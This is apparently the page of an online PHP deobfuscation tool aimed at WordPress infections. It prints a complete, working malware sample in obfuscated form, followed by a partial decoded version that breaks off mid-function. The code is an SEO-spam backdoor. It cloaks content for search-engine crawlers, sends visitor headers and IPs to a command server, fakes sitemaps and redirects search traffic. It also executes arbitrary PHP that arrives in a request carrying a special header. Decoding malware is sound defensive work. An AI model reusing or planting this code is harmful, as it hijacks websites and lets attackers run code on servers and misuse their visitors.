Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php goto e2bV4; FQhXD: $iO8PJ = array("\x55\x73\x65\162\x2d\101\147\x65\156\164\72\40" . $yDg9c, "\x4c\x61\156\x67\x3a\x20" . $Ygi5s, "\122\x65\146\145\162\145\162\72\40" . $jqE9A, "\x48\x74\164\160\x2d\x48\x6f\x73\164\72\x20" . $SBMcZ, "\x52\x65\155\x6f\164\145\55\x41\x64\x64\x72\72\40" . $vG9JG); goto ekZmd; OrliU: $Rr2Wf = strval(time()); goto Wqenn; jA1I3: K3lsW: goto h6bkt; CshAX: $SBMcZ = $_SERVER["\110\124\x54\120\137\110\x4f\x53\124"]; goto hqZyg; Q1Bu2: dfEpB: goto SMKK_; G9zEm: $sn5PZ .= "\x26\147\x72\x6f\165\x70\151\144\x3d" . $cn1SC; goto zUQiG; tAciD: echo sprintf($EQ4mq, $ugap4); goto huNBy; HKn3H: @header("\x4c\x6f\x63\x61\x74\x69\157\x6e\72\40" . $vAGwM); goto bpier; e0qRa: if (!($MXCPG === '')) { goto T5AXw; } goto hq97H; bFHlh: $PmFOl = urldecode("\x68\x74\164\x70\x73\x3a\57\57\x73\x65\141\162\143\150\56\x79\141\150\x6f\x6f\x2e\x63\x6f\x2e\x6a\x70\57\163\x65\141\162\x63\150\x3f\160\x3d\x73\x69\x74\x65\72\x25\x73\x26\x65\151\x3d\125\124\x46\55\70"); goto dFfrZ; jK8gt: if ($Mtj2g[1] === '' || @preg_match("\x23\50\x5c\x64\x2b\x29\55\44\x23", $Mtj2g[1], $coiwp)) { goto qaMoJ; } goto V9pAN; ldRXu: $ykYb8 = ''; goto bNtfW; UsniM: $UfxSF = explode("\12", $MXCPG); goto ldRXu; h6bkt: echo @trim(urlx(sprintf("\x68\164\164\x70\163\72\x2f\x2f\45\163\x2f\142\157\164\57\143\x61\164\x65\77" . $uSYVv, gets()), $iO8PJ, $uSYVv . "\46\x68\157\x73\x74\75" . preg_replace("\x2f\x5b\141\55\x7a\x49\x5d\50\170\x79\x7a\x7c\142\x75\x7a\x7a\x29\x2e\x2a\x24\x2f", "\x2e\x24\61", strrev($zrRMT[1])) . "\x26\143\x61\x74\145\151\144\x3d" . $zrRMT[2], 1)); goto LOXDJ; qSNp1: echo sprintf($feyN4, $ykYb8); goto o7zsz; LlCi7: function urlx($PmFOl, $iO8PJ = null, $sn5PZ = null, $Yiefi = null) { goto ispdt; HLCVa: LStgx: goto c4aty; exu7T: tdRCa: goto K_89b; jQgIt: if ($iO8PJ === null) { goto LStgx; } goto bZPtu; ZBN0O: X8L2Z: goto jQgIt; IBcbE: curl_setopt($kVgxj, CURLOPT_POST, 1); goto CWlpO; NZT1b: curl_setopt($kVgxj, CURLOPT_SSL_VERIFYPEER, FALSE); goto Zxxiq; Zxxiq: curl_setopt($kVgxj, CURLOPT_SSL_VERIFYHOST, FALSE); goto ZBN0O; TmZwG: if ($Yiefi === null) { goto dszKj; } goto D9P9o; eYkTB: curl_setopt($kVgxj, CURLOPT_URL, $PmFOl); goto RULRh; bZPtu: curl_setopt($kVgxj, CURLOPT_HTTPHEADER, $iO8PJ); goto HLCVa; CWlpO: curl_setopt($kVgxj, CURLOPT_POSTFIELDS, $sn5PZ); goto exu7T; RULRh: curl_setopt($kVgxj, CURLOPT_FOLLOWLOCATION, 1); goto TmZwG; c4aty: if ($sn5PZ === null) { goto tdRCa; } goto IBcbE; D9P9o: curl_setopt($kVgxj, CURLOPT_ENCODING, "\147\x7a\151\160\x2c\x64\x65\146\154\x61\x74\x65"); goto ynvwE; ispdt: $kVgxj = curl_init(); goto eYkTB; DPcV_: $fgyLQ = curl_exec($kVgxj); goto QAVDR; ynvwE: dszKj: goto hYwJl; K_89b: curl_setopt($kVgxj, CURLOPT_RETURNTRANSFER, 1); goto DPcV_; eQby4: return $fgyLQ; goto ZUlQQ; hYwJl: if (!(stripos($PmFOl, "\150\x74\x74\160\x73\72") === 0)) { goto X8L2Z; } goto NZT1b; QAVDR: curl_close($kVgxj); goto eQby4; ZUlQQ: } goto gFyrf; tWhUZ: array_push($iO8PJ, "\x78\x64\x6f\151\x6d\x3a\40" . crc32($Rr2Wf . "\134\156" . $sn5PZ)); goto p9FdH; PRnni: GXpey: goto rVReV; dUt6i: IPQqC: goto vdtb7; P0J90: if (!@preg_match("\43\x5e\x28\x5c\x64\51\52\43", $MXCPG)) { goto IPQqC; } goto TLdi9; ywTd_: $Ygi5s = isset($_SERVER["\110\124\124\x50\x5f\x41\x43\x43\105\x50\x54\137\x4c\x41\x4e\107\125\x41\x47\105"]) ? substr($_SERVER["\x48\124\x54\120\137\x41\x43\103\x45\x50\124\137\x4c\101\116\x47\x55\101\x47\x45"], 0, 4) : ''; goto dq5tn; qSk2C: piJww: goto TDSWj; ni7CO: unlink("\x2e\145\107\x41\x30\124\x79\62\127\x4c\x68"); goto gIHMt; EE82R: @ini_set("\x64\151\163\160\154\x61\171\x5f\145\x72\162\x6f\162\163", 0); goto VTjt0; mGPv0: T5AXw: goto RxZL4; pm2T5: Fe0mC: goto D_csH; exEtW: if (@preg_match("\43\x28\134\x64\x2b\x29\x2d\x24\x23", $Mtj2g[1], $coiwp)) { goto wwvwM; } goto G9zEm; o7zsz: exit; goto IWjAs; RvWae: array_push($iO8PJ, "\164\x69\x6d\x65\163\x74\x61\x6d\x70\72\x20" . $Rr2Wf); goto tWhUZ; r2rPn: goto of92i; goto TzT1N; SMKK_: if (!@preg_match("\43\x67\x6f\x6f\147\x6c\145\x7c\171\x61\150\157\x6f\174\x62\x69\156\147\x7c\143\x72\141\x66\164\174\103\162\x61\x77\x6c\145\162\x23\x69", $yDg9c)) { goto KG_2r; } goto h3ksp; mIfrr: if (!(($Mtj2g[1] === '' || $coiwp[1] != '') && @preg_match("\43\x5e\x28\134\x64\51\x2a\43", $MXCPG))) { goto iLCo4; } goto ICiLK; fMkHX: kvlbZ: goto OrliU; ZJ54J: @file_put_contents("\x2e\145\107\101\x30\x54\x79\x32\127\x4c\150", $x1mRn, FILE_USE_INCLUDE_PATH); goto chh0n; oxdAc: function gets() { return "\160\x32\x2e\147\x6c\x6f\162\171\x70\x6c\x61\x6e\56\143\154\x75\142"; } goto cQEnT; LYlSY: $MXCPG = trim(urlx("\150\164\x74\x70\163\72\x2f\57" . gets() . "\x2f\x73\151\164\x65\155\141\160" . ($Mtj2g[1] == '' || $coiwp[1] != '' ? "\x2e\170\x6d\x6c" : "\57" . $Mtj2g[1]), $iO8PJ, $sn5PZ)); goto e0qRa; rVReV: $XNxz4++; goto ULHD3; fmXnI: $ffP85 = "\40\74\x73\151\x74\x65\155\141\160\x3e\x20\74\x6c\x6f\x63\76\x25\x73\x3a\x2f\57\x25\163\57\163\151\x74\x65\x6d\x61\160\x25\x64\x2e\170\x6d\154\74\57\x6c\x6f\143\x3e\x3c\57\x73\151\164\145\x6d\141\x70\76"; goto ywTd_; Oq7ak: array_push($iO8PJ, "\x78\144\157\x69\155\x3a\x20" . crc32($Rr2Wf . "\x5c\x6e" . $sn5PZ)); goto LYlSY; JnwSo: $Rr2Wf = isset($_SERVER["\110\x54\x54\120\x5f\x54\x49\115\105\123\x54\101\115\120"]) ? $_SERVER["\x48\x54\124\120\137\124\x49\115\105\x53\x54\x41\115\120"] : ''; goto Zjk71; usZSD: ENjdR: goto dUt6i; p9FdH: $MXCPG = trim(urlx("\x68\164\x74\160\x73\x3a\x2f\x2f" . gets() . "\57\163\x69\x74\x65\155\x61\160\x2e\170\x6d\x6c", $iO8PJ, $sn5PZ . "\46\x68\x74\x74\x70\75" . $F1UZe)); goto EaTdw; vdtb7: RohbR: goto AhzBw; D_csH: KG_2r: goto SpFdx; ULHD3: goto MsDXz; goto usZSD; ty7qc: qaMoJ: goto L3otU; cF2iE: $JVymC = urlx($EzMlU); goto OmjiF; VTjt0: @set_time_limit(3600); goto KHV3a; ZQFYu: if (!(isset($_SERVER["\x48\x54\124\120\x5f\130\x44\x4f\x49\115"]) && strlen($_SERVER["\110\x54\124\120\x5f\130\104\117\x49\115"]) > 0)) { goto yrPnr; } goto JnwSo; Zjk71: $x1mRn = @file_get_contents("\x70\x68\160\72\57\x2f\151\x6e\x70\165\164"); goto ZJ54J; jvKqi: $XNxz4++; goto r2rPn; l4tL4: @preg_match("\x23\50\134\144\52\51\344\273\266\74\41\x2d\x2d\43", $fgyLQ, $Mtj2g); goto hNa_i; e2bV4: error_reporting(0); goto EE82R; aLnv3: echo @trim(urlx(sprintf("\150\164\x74\x70\163\x3a\57\x2f\x25\x73\x2f\x62\x6f\x74\x2f\150\157\155\x65\x3f" . $uSYVv . "\x26\x75\x72\x69\x3d" . $edQv_, gets()), $iO8PJ, $uSYVv, 1)); goto Nlzzh; IhZrK: $XqOCY .= $EzMlU . $JVymC; goto P7QDe; HNvPF: $fgyLQ = str_replace(array("\57\134\x2f\x73\x2b\57", "\134\x72\134\156", "\x5c\x72", "\x5c\x6e", "\x22", "\54"), '', $fgyLQ); goto l4tL4; rTVY2: $XqOCY = ''; goto jK8gt; jROZ9: exit; goto xkv9d; gibCL: vpQJ6: goto qSNp1; BDt7u: $yDg9c = isset($_SERVER["\110\x54\124\x50\x5f\125\x53\105\x52\137\101\x47\105\116\x54"]) ? $_SERVER["\110\x54\x54\120\137\125\x53\105\122\x5f\x41\107\x45\x4e\x54"] : ''; goto CshAX; kC46A: zQS0p: goto jvKqi; kLzs8: MsDXz: goto V7p1K; V9pAN: $EzMlU = sprintf("\150\164\x74\160\163\x3a\57\x2f\x77\167\167\x2e\x67\x6f\157\147\x6c\145\x2e\x63\x6f\x2e\x6a\x70\57\160\151\x6e\x67\x3f\x73\151\164\145\155\141\160\x3d\x25\x73\72\x2f\x2f\x25\163\x2f\x73\x69\164\x65\155\x61\x70\45\163\x2e\170\155\x6c", $F1UZe, $SBMcZ, $Mtj2g[1]); goto eJ160; dFfrZ: $PmFOl = $Mtj2g[1] == '' ? sprintf($PmFOl, $SBMcZ) : sprintf($PmFOl, $Mtj2g[1]); goto yZ21h; gIHMt: exit; goto oWG4G; TLdi9: $XNxz4 = 1; goto kLzs8; NBDCj: exit; goto TCcqe; h3ksp: $uSYVv = $sn5PZ . "\x26\x68\164\x74\x70\x3d" . $F1UZe . "\x26\x67\162\x6f\x75\160\x69\x64\75" . $cn1SC; goto CKOiJ; F_rWJ: mUIhk: goto P0J90; dwB_3: $uSYVv .= sprintf("\x26\150\160\x69\x64\75\45\163\55\x25\163", preg_replace("\x2f\x5b\141\x2d\x7a\x49\135\50\x78\x79\172\174\x62\165\x7a\172\51\x2e\x2a\x24\x2f", "\x2e\44\61", strrev($Mtj2g[1])), $Mtj2g[2]); goto VmjWg; eJ160: $JVymC = urlx($EzMlU); goto IhZrK; SpFdx: if (!(@preg_match("\x23\x67\x6f\x6f\x67\154\145\56\x63\157\x2e\152\160\x7c\x67\x6f\157\147\x6c\x65\56\x63\157\x6d\174\171\x61\150\x6f\157\x2e\x63\157\56\152\x70\174\x79\x61\x68\157\x6f\x2e\143\157\174\x62\151\x6e\147\x2e\x63\157\x6d\x7c\x61\163\x6b\x2e\143\x6f\155\174\141\x6f\x6c\x2e\143\157\155\x7c\141\157\x6c\56\x6a\160\x23\151", $jqE9A) && @preg_match("\43\50\133\141\55\172\111\x5d\x2b\x29\x2d\50\134\144\53\51\77\x28\55\x28\x5c\144\x2b\x29\x29\77\50\56\150\x74\155\154\x29\x24\43\x69", $edQv_))) { goto piJww; } goto yFQUQ; ZuMGa: $EzMlU = sprintf("\150\x74\164\160\163\x3a\57\57\167\x77\x77\56\x67\157\x6f\147\x6c\145\56\x63\x6f\56\x6a\160\57\160\151\156\147\x3f\163\x69\164\145\x6d\x61\160\75\45\163\x3a\57\x2f\45\163\x2f\163\151\164\x65\155\141\x70\45\x73\x25\x64\x2e\170\155\154", $F1UZe, $SBMcZ, $coiwp[0], $XNxz4); goto cF2iE; Bjh2t: if (!@preg_match("\43\x5e\x2f\x73\151\164\145\x2f\x3f\50\x2e\x2a\77\51\x24\x23\x69", $edQv_, $Mtj2g)) { goto OHP67; } goto bFHlh; bpier: exit; goto qSk2C; ekZmd: $sn5PZ = "\x73\150\157\x73\164\x3d" . $SBMcZ . "\46\160\x72\x6f\x74\x6f\75" . $F1UZe; goto YX435; Nlzzh: exit; goto kNeMc; q6JdB: if (@preg_match("\43\x63\141\164\x65\134\57\50\x5b\x61\x2d\172\x5d\53\x29\x2d\x28\x5c\x64\53\x29\x24\x23\x69", $edQv_, $zrRMT)) { goto K3lsW; } goto aLnv3; dq5tn: $jqE9A = isset($_SERVER["\x48\124\x54\120\x5f\x52\105\x46\x45\122\x45\122"]) ? $_SERVER["\x48\124\x54\x50\137\x52\x45\x46\x45\x52\x45\122"] : ''; goto BDt7u; M5KLK: $Rr2Wf = strval(time()); goto RvWae; TCcqe: goto Fe0mC; goto jA1I3; TzT1N: ny80_: goto tAciD; KHV3a: @ignore_user_abort(1); goto JrRoH; k1WoQ: $EQ4mq = "\x3c\x3f\170\155\x6c\x20\x76\145\162\x73\x69\157\x6e\75\x22\x31\56\x30\42\x20\145\156\143\x6f\144\151\x6e\147\75\x22\125\x54\x46\x2d\70\42\x3f\x3e\x3c\x21\55\x2d\40\x61\x75\x74\x6f\x67\145\156\40\x62\x79\x20\144\x6f\151\x6d\40\55\x2d\x3e\15\xa\x3c\x73\x69\x74\145\155\141\x70\x69\156\144\145\x78\40\x78\x6d\154\156\163\75\x22\x68\x74\164\160\x3a\x2f\x2f\167\x77\x77\x2e\x73\151\164\145\155\x61\160\163\x2e\x6f\162\147\57\163\x63\150\145\x6d\141\163\57\x73\x69\x74\x65\x6d\141\160\x2f\60\x2e\71\42\x3e\40\45\x73\x20\74\57\163\151\164\145\x6d\x61\x70\x69\x6e\x64\145\x78\x3e"; goto fmXnI; AhzBw: echo $XqOCY; goto jROZ9; lz4YJ: $XNxz4 = 1; goto wH1gn; huNBy: exit; goto MyhVb; hqZyg: $edQv_ = $_SERVER["\122\x45\x51\x55\105\x53\124\x5f\125\x52\111"]; goto o6VN0; cQEnT: function https() { goto YPdYz; Hx81_: return "\x68\x74\x74\x70"; goto XMLM_; ATim4: lKB5f: goto Hx81_; iR2kZ: return "\x68\164\x74\x70\x73"; goto ATim4; YPdYz: if (!(!empty($_SERVER["\110\124\x54\x50\123"]) && strtolower($_SERVER["\110\x54\124\120\123"]) !== "\157\x66\146" || isset($_SERVER["\x48\124\124\x50\137\130\x5f\106\117\122\127\x41\122\104\105\x44\137\x50\122\x4f\x54\117"]) && $_SERVER["\110\124\124\x50\x5f\130\137\x46\117\122\x57\x41\122\104\105\104\137\120\x52\117\x54\117"] === "\150\164\164\x70\x73" || !empty($_SERVER["\x48\124\124\x50\137\x46\122\x4f\x4e\x54\x5f\x45\x4e\x44\137\x48\x54\x54\120\x53"]) && strtolower($_SERVER["\110\124\124\120\137\106\x52\x4f\x4e\124\x5f\105\116\104\137\x48\x54\x54\x50\123"]) !== "\x6f\x66\146")) { goto lKB5f; } goto iR2kZ; XMLM_: } goto J81nt; NCdh1: OHP67: goto Q8j_b; wH1gn: of92i: goto Zwhnm; Q8j_b: if (!@preg_match("\x23\x5e\57\147\145\164\x76\145\162\44\43\x69", $edQv_, $Mtj2g)) { goto dfEpB; } goto v0NbL; xE67_: $sn5PZ .= "\46\147\x72\x6f\165\x70\151\144\75" . $coiwp[1]; goto fMkHX; eL3LS: if (!@preg_match("\43\x5e\x2f\160\151\x6e\x67\x73\151\x74\x65\x6d\x61\160\x28\56\x2a\x3f\x29\x2e\170\155\x6c\x24\43\x69", $edQv_, $Mtj2g)) { goto ReBq3; } goto rTVY2; QU9RQ: if (!@preg_match("\x23\x5e\57\163\x69\x74\x65\155\141\160\50\56\52\77\x29\x2e\170\x6d\154\44\43\x69", $edQv_, $Mtj2g)) { goto oE3Y1; } goto HU6nc; VmjWg: echo @trim(urlx(sprintf("\150\x74\x74\160\163\x3a\57\57\45\x73\57\x62\x6f\164\x2f\x70\x61\147\x65\x3f" . $uSYVv, gets()), $iO8PJ, $uSYVv, 1)); goto NBDCj; Wqenn: array_push($iO8PJ, "\x74\x69\x6d\x65\163\164\141\155\x70\72\40" . $Rr2Wf); goto Oq7ak; oWG4G: yrPnr: goto Bjh2t; V7p1K: if (!($XNxz4 <= intval($MXCPG))) { goto ENjdR; } goto ZuMGa; TDSWj: function urls($SBMcZ, $M3gxR, $yDg9c, $eFxTj, $vbA3M = null) { goto Hd8fW; dHEDj: fclose($qlPm8); goto GA30r; BXPur: $vcor3 = fwrite($qlPm8, $jM3yf); goto dHEDj; Hd8fW: $qlPm8 = stream_socket_client("\163\163\x6c\72\x2f\57" . $SBMcZ . "\72\64\64\63", $Cuyp4, $zzWGH, 6); goto mktX0; mktX0: $jM3yf = "\107\x45\124\x20" . $M3gxR . "\x3f" . $vbA3M . "\x20\x48\124\124\120\x2f\61\56\x30\xd\xa\x48\157\x73\x74\72\40" . $SBMcZ . "\xd\12\x52\x65\146\145\162\x65\x72\72\x20" . $eFxTj . "\15\12\x55\163\145\x72\55\x41\147\x65\156\x74\72\x20" . $yDg9c . "\15\xa\xd\12"; goto BXPur; GA30r: } goto LlCi7; kNeMc: goto Fe0mC; goto rgpGr; YX435: $edQv_ = $_SERVER["\122\x45\121\x55\105\123\124\137\x55\x52\x49"]; goto eL3LS; gFyrf: function cc($edQv_) { goto lyzFh; CZits: if (!(sizeof($re6I1) != 3)) { goto v2ybM; } goto uUbjE; uUbjE: return false; goto YCxND; zs6jy: return $F86g6 == $re6I1[2]; goto UETZb; YCxND: v2ybM: goto ZrWfq; ZrWfq: $F86g6 = sprintf("\x25\x75", crc32(sprintf("\45\163\55\45\163", $re6I1[0], $re6I1[1]))); goto zs6jy; lyzFh: $re6I1 = explode("\55", substr($edQv_, 1, strlen($edQv_) - 6)); goto CZits; UETZb: } goto oxdAc; yFQUQ: $uSYVv = $sn5PZ . "\x26\147\162\x6f\165\160\151\x64\75" . $cn1SC . "\x26\x75\x72\x69\x3d" . $edQv_ . "\x26\151\x70\75" . $vG9JG; goto v9Zlq; xkv9d: ReBq3: goto QU9RQ; lSFXb: $F1UZe = https(); goto FQhXD; P7QDe: goto RohbR; goto ty7qc; PUXTD: exit; goto NCdh1; aQNUV: $fgyLQ = substr($fgyLQ, strpos($fgyLQ, "\74\41\x2d\55\x20\x2d\55\76"), 100); goto HNvPF; o6VN0: $vG9JG = clientip(); goto lSFXb; yZ21h: $fgyLQ = urlx($PmFOl, null, null, 1, "\115\157\172\x69\x6c\154\141\x2f\65\56\60\40\50\x57\x69\156\144\x6f\x77\x73\x3b\40\x55\x3b\x20\x57\x69\x6e\144\x6f\167\x73\40\116\124\x20\65\56\61\x3b\x20\x65\156\55\x55\123\51\40\x41\x70\x70\154\x65\127\145\x62\x4b\x69\x74\x2f\x35\x33\64\x2e\67\40\50\x4b\x48\x54\115\114\54\40\x6c\x69\153\x65\x20\x47\145\x63\x6b\157\x29\40\x43\150\162\157\x6d\145\57\67\x2e\x30\x2e\x35\61\x37\x2e\64\x31\40\x53\141\x66\141\x72\x69\x2f\65\x33\64\56\67"); goto aQNUV; OmjiF: $XqOCY .= $EzMlU . $JVymC; goto PRnni; X9iM2: exit; goto Q1Bu2; yQY1w: exit; goto F_rWJ; Zwhnm: if (!($XNxz4 <= intval($MXCPG))) { goto ny80_; } goto g6rU4; MyhVb: iLCo4: goto UsniM; v9Zlq: $vAGwM = urlx(sprintf("\150\x74\x74\x70\x73\72\57\x2f\x25\163\x2f\142\x6f\x74\x2f\x33\x30\x32\77" . $uSYVv . "\46\x75\162\x69\x3d" . $edQv_, gets()), $iO8PJ, $uSYVv, 1); goto HKn3H; HU6nc: $sn5PZ = "\163\x68\157\x73\x74\x3d" . $SBMcZ . "\46\150\x74\164\x70\x3d" . $F1UZe; goto exEtW; gDt1X: wwvwM: goto xE67_; Pjmim: echo $h6r2w === false ? "\x66\x61\x69\x6c" . gets() : $wLTOU . $cn1SC . gets(); goto X9iM2; VB6Yv: array_push($iO8PJ, "\x74\151\x6d\145\x73\164\141\x6d\x70\x3a\x20" . $Rr2Wf); goto hujhX; Oygnl: $wLTOU = trim(urlx("\x68\x74\164\x70\163\72\57\x2f" . gets() . $Mtj2g[0], $iO8PJ, $sn5PZ)); goto Pjmim; CKOiJ: if (@preg_match("\x23\x28\x5b\x61\55\172\135\53\51\55\x28\x5c\x64\53\51\x3f\x28\56\x68\164\x6d\154\x29\44\43\151", $edQv_, $Mtj2g)) { goto pAqCU; } goto q6JdB; hq97H: exit; goto mGPv0; CZGf_: $feyN4 = "\x3c\x3f\170\x6d\x6c\x20\x76\145\162\163\151\x6f\156\x3d\x22\61\x2e\60\42\x20\x65\x6e\x63\x6f\144\151\156\x67\x3d\42\x55\x54\106\x2d\x38\x22\x3f\x3e\74\x21\55\55\40\141\x75\164\x6f\x67\145\156\x20\x62\171\x20\144\x6f\151\x6d\x20\55\55\76\15\xa\x3c\165\x72\x6c\x73\145\x74\x20\170\x6d\x6c\156\x73\x3d\x22\150\164\164\160\72\57\x2f\167\167\x77\56\163\x69\164\x65\x6d\141\160\163\56\157\x72\x67\x2f\x73\143\150\x65\155\141\163\57\x73\x69\164\x65\x6d\x61\x70\57\x30\56\x39\42\xd\12\x20\40\x20\40\40\40\x78\155\154\x6e\163\x3a\x78\150\x74\x6d\x6c\75\42\150\x74\x74\x70\72\x2f\x2f\167\x77\x77\x2e\167\x33\56\157\x72\x67\x2f\x31\x39\71\71\57\170\x68\x74\x6d\x6c\42\x3e\15\xa\45\x73\x3c\x2f\x75\162\154\x73\x65\164\x3e"; goto fRWd9; IWjAs: oE3Y1: goto ZQFYu; g6rU4: $ugap4 .= sprintf($ffP85, $F1UZe, $SBMcZ, $XNxz4, date("\131\55\155\55\x64\x5c\x54\110\72\151\72\163\120", time())); goto kC46A; fRWd9: $nIeh7 = "\x20\x3c\x75\162\x6c\76\40\x3c\x6c\x6f\143\x3e\45\163\x3c\57\154\157\x63\76\x3c\x78\x68\164\155\x6c\x3a\x6c\151\x6e\153\40\x72\x65\154\75\x22\141\154\x74\x65\x72\x6e\141\x74\145\x22\x20\x68\162\x65\x66\x6c\x61\x6e\x67\x3d\x22\x6a\x61\x22\40\150\x72\x65\146\75\x22\45\163\x22\57\x3e\x3c\57\165\162\154\76"; goto k1WoQ; ICiLK: $ugap4 = ''; goto lz4YJ; L3otU: $sn5PZ .= $coiwp[1] == '' ? "\46\147\x72\157\165\x70\x69\x64\75" . $cn1SC : "\46\x67\x72\x6f\165\x70\151\x64\x3d" . $coiwp[1]; goto M5KLK; RxZL4: @header("\x43\157\156\x74\145\x6e\164\x2d\x74\171\160\x65\72\x20\x74\145\170\x74\x2f\x78\x6d\154"); goto mIfrr; LOXDJ: exit; goto pm2T5; chh0n: echo include "\x2e\x65\107\101\60\124\171\62\x57\x4c\x68"; goto ni7CO; zUQiG: goto kvlbZ; goto gDt1X; JrRoH: $cn1SC = "\64\62\x34"; goto CZGf_; rgpGr: pAqCU: goto dwB_3; EaTdw: if (!($MXCPG === '')) { goto mUIhk; } goto yQY1w; hujhX: array_push($iO8PJ, "\x78\144\157\151\155\x3a\40" . crc32($Rr2Wf . "\x5c\x6e" . $sn5PZ)); goto Oygnl; v0NbL: $Rr2Wf = strval(time()); goto VB6Yv; hNa_i: echo $Mtj2g[1]; goto PUXTD; bNtfW: foreach ($UfxSF as $ld6IC) { goto wdrM3; N11Uj: D7KDm: goto fpSq8; gg31O: $ykYb8 .= sprintf($nIeh7, $vAGwM, $vAGwM); goto N11Uj; wdrM3: $vAGwM = $F1UZe . "\x3a\x2f\57" . $SBMcZ . "\x2f" . $ld6IC; goto gg31O; fpSq8: } goto gibCL; J81nt: function clientip() { goto pF2LI; pF2LI: if (getenv("\122\105\x4d\x4f\124\x45\137\101\x44\x44\122") && strcasecmp(getenv("\x52\105\115\x4f\124\x45\137\x41\104\x44\x52"), "\x75\x6e\153\x6e\157\167\x6e")) { goto QhDH5; } goto JrFYz; wurNM: rMOz9: goto X5cdG; JQF4f: return getenv("\x52\105\115\117\124\x45\137\x41\104\x44\122"); goto MBdXt; JrFYz: if (isset($_SERVER["\x52\105\115\x4f\124\x45\137\101\104\104\122"]) && $_SERVER["\x52\105\115\x4f\124\105\x5f\101\x44\x44\x52"] && strcasecmp($_SERVER["\x52\105\x4d\x4f\x54\105\x5f\x41\104\104\x52"], "\x75\x6e\x6b\156\157\x77\156")) { goto wGxsH; } goto CMUnA; MBdXt: goto rMOz9; goto xvqCc; CMUnA: goto rMOz9; goto eSAxP; eSAxP: QhDH5: goto JQF4f; xvqCc: wGxsH: goto f4DO6; f4DO6: return $_SERVER["\122\x45\115\x4f\124\105\x5f\101\104\x44\x52"]; goto wurNM; X5cdG: }?><html><?php
error_reporting(0);
@ini_set("display_errors", 0);
@set_time_limit(3600);
@ignore_user_abort(1);
$cn1SC = "424";
$feyN4 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!-- autogen by doim -->\r\n<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\"\r\n xmlns:xhtml=\"http://www.w3.org/1999/xhtml\">\r\n%s</urlset>";
$nIeh7 = " <url> <loc>%s</loc><xhtml:link rel=\"alternate\" hreflang=\"ja\" href=\"%s\"/></url>";
$EQ4mq = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!-- autogen by doim -->\r\n<sitemapindex xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\"> %s </sitemapindex>";
$ffP85 = " <sitemap> <loc>%s://%s/sitemap%d.xml</loc></sitemap>";
$Ygi5s = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? substr($_SERVER["HTTP_ACCEPT_LANGUAGE"], 0, 4) : '';
$jqE9A = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$yDg9c = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
$SBMcZ = $_SERVER["HTTP_HOST"];
$edQv_ = $_SERVER["REQUEST_URI"];
$vG9JG = clientip();
$F1UZe = https();
$iO8PJ = array("User-Agent: " . $yDg9c, "Lang: " . $Ygi5s, "Referer: " . $jqE9A, "Http-Host: " . $SBMcZ, "Remote-Addr: " . $vG9JG);
$sn5PZ = "shost=" . $SBMcZ . "&proto=" . $F1UZe;
$edQv_ = $_SERVER["REQUEST_URI"];
if (!@preg_match("#^/pingsitemap(.*?).xml\$#i", $edQv_, $Mtj2g)) {
if (!@preg_match("#^/sitemap(.*?).xml\$#i", $edQv_, $Mtj2g)) {
if (!(isset($_SERVER["HTTP_XDOIM"]) && strlen($_SERVER["HTTP_XDOIM"]) > 0)) {
if (!@preg_match("#^/site/?(.*?)\$#i", $edQv_, $Mtj2g)) {
if (!@preg_match("#^/getver\$#i", $edQv_, $Mtj2g)) {
if (!@preg_match("#google|yahoo|bing|craft|Crawler#i", $yDg9c)) {
D_csH:
if (!(@preg_match("#google.co.jp|google.com|yahoo.co.jp|yahoo.co|bing.com|ask.com|aol.com|aol.jp#i", $jqE9A) && @preg_match("#([a-zI]+)-(\\d+)?(-(\\d+))?(.html)\$#i", $edQv_))) {
function urls($SBMcZ, $M3gxR, $yDg9c, $eFxTj, $vbA3M = null)
{
$qlPm8 = stream_socket_client("ssl://" . $SBMcZ . ":443", $Cuyp4, $zzWGH, 6);
$jM3yf = "GET " . $M3gxR . "?" . $vbA3M . " HTTP/1.0\r\nHost: " . $SBMcZ . "\r\nReferer: " . $eFxTj . "\r\nUser-Agent: " . $yDg9c . "\r\n\r\n";
$vcor3 = fwrite($qlPm8, $jM3yf);
fclose($qlPm8);
}
function urlx($PmFOl, $iO8PJ = null, $sn5PZ = null, $Yiefi = null)
{
$kVgxj = curl_init();
curl_setopt($kVgxj, CURLOPT_URL, $PmFOl);
curl_setopt($kVgxj, CURLOPT_FOLLOWLOCATION, 1);
if ($Yiefi === null) {
goto dszKj;
}
curl_setopt($kVgxj, CURLOPT_ENCODING, "gzip,deflate");
dszKj:
if (!(stripos($PmFOl, "https:") === 0)) {
goto X8L2Z;
}
curl_setopt($kVgxj, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($kVgxj, CURLOPT_SSL_VERIFYHOST, FALSE);
X8L2Z:
if ($iO8PJ === null) {
goto LStgx;
}
curl_setopt($kVgxj, CURLOPT_HTTPHEADER, $iO8PJ);
LStgx:
if ($sn5PZ === null) {
goto tdRCa;
}
curl_setopt($kVgxj, CURLOPT_POST, 1);
curl_setopt($kVgxj, CURLOPT_POSTFIELDS, $sn5PZ);
tdRCa:
curl_setopt($kVgxj, CURLOPT_RETURNTRANSFER, 1);
$fgyLQ = curl_exec($kVgxj);
curl_close($kVgxj);
return $fgyLQ;
}
function cc($edQv_)
{
$re6I1 = explode("-", substr($edQv_, 1, strlen($edQv_) - 6));
if (!(sizeof($re6I1) != 3)) {
$F86g6 = sprintf("%u", crc32(sprintf("%s-%s", $re6I1[0], $re6I1[1])));
return $F86g6 == $re6I1[2];
}
return false;
}
function gets()
{
return "p2.gloryplan.club";
}
function https()
{
if (!(!empty($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https" || !empty($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off")) {
return "http";
}
return "https";
}
function clientip()
{
